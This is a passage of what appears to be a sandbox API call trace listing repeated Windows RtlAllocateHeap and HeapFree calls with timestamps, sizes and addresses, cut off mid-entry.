[0196.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0196.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0196.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.886] RtlAllocateHeap 